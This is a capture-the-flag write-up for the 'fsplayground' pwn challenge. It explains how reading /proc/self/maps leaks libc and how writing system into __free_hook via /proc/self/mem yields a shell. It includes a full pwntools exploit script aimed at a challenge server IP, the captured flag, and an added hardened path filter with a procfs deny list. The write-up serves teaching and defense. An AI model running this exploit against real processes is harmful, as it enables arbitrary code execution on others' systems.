[Pwn] fsplayground
xp0int, Posted on Sep 6 2020

The program lets you open, close, seek, read and write any file except `flag`; the read and write operations call malloc and free internally. First, open `/proc/self/maps` to leak the libc base address. Then open `/proc/self/mem` and use seek plus write to overwrite the free hook with the address of `system`. Finally, a write of the string `"/bin/sh\x00"` frees the buffer holding it, so the hook calls `system("/bin/sh")` and we get a shell.

```python
#!/usr/bin/env python3
from pwn import *

context(arch="amd64", log_level="debug")
p = remote("119.3.111.133", 6666)
libc = ELF("./libc-2.27.so")

p_sl = lambda x, y : p.sendlineafter(y, x)

def Open(fn, opt):
    p_sl('1', "Your choice: ")
    p_sl(fn+'\x00', "Filename: ")
    p_sl(str(opt), "Option: ")

def Seek(s):
    p_sl('3', "Your choice: ")
    p_sl(str(s), "Offset: ")

def Close():
    p_sl('2', "Your choice: ")

def Read(sz):
    p_sl('4', "Your choice: ")
    p_sl(str(sz), "Size: ")

def Write(sz, ctx):
    p_sl('5', "Your choice: ")
    p_sl(str(sz), "Size: ")
    p_sl(ctx, "Content: ")

# Leak the libc base from the process memory map.
Open("/proc/self/maps", 0)
Read(0x500)
p.recvuntil("[heap]\n")
libc.address = int(p.recvuntil("-", True), 16)
Close()

# Write system into __free_hook through /proc/self/mem.
Open("/proc/self/mem", 1)
Seek(libc.symbols["__free_hook"])
Write(8, p64(libc.symbols["system"]))

# The write buffer is freed afterwards, triggering the hook.
Write(8, "/bin/sh\x00")
p.interactive()
```

flag:`flag{910efb50faa7407b916c206217951dd0}`
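The root cause here is a filename filter that only denies the name `flag`, so the procfs views of the process's own memory pass it. The following is an added example, not the challenge's or the author's code: the weak name check beside a hardened one that resolves the path and confines it to an assumed sandbox directory (`/srv/fsplayground/files` is a placeholder).

```python
#!/usr/bin/env python3
import os

# Assumed sandbox root; the challenge's real directory layout is not known.
SANDBOX_ROOT = "/srv/fsplayground/files"
# Pseudo-filesystems that expose process memory, memory layout and devices.
DENIED_PREFIXES = ("/proc/", "/sys/", "/dev/")


def weak_is_allowed(filename: str) -> bool:
    """Filter as the challenge behaves: only a file named 'flag' is refused.

    Any other path, including /proc/self/maps and /proc/self/mem, is accepted.
    """
    return os.path.basename(filename) != "flag"


def hardened_is_allowed(filename: str, root: str = SANDBOX_ROOT) -> bool:
    """Accept only paths that stay inside `root` after symlink resolution.

    Absolute paths, '..' traversal and procfs/sysfs/devfs are all refused,
    and the flag file stays off limits by name.
    """
    if "\x00" in filename:
        # An embedded NUL would truncate the name at the C layer (fopen/open),
        # letting the checked string and the opened path differ.
        return False
    root_resolved = os.path.realpath(root)
    # os.path.join discards `root` when `filename` is absolute, which is
    # exactly the case the containment check below must catch.
    resolved = os.path.realpath(os.path.join(root, filename))
    if resolved.startswith(DENIED_PREFIXES):
        return False
    if os.path.commonpath([resolved, root_resolved]) != root_resolved:
        return False  # escaped the sandbox (absolute path or '..' traversal)
    return os.path.basename(resolved) != "flag"


if __name__ == "__main__":
    # Constructed sample requests mirroring the writeup's exploit path.
    for name in ("/proc/self/maps", "/proc/self/mem", "../../etc/passwd",
                 "flag", "notes.txt"):
        print(f"{name!r:22} weak={weak_is_allowed(name)!s:5} "
              f"hardened={hardened_is_allowed(name)}")
```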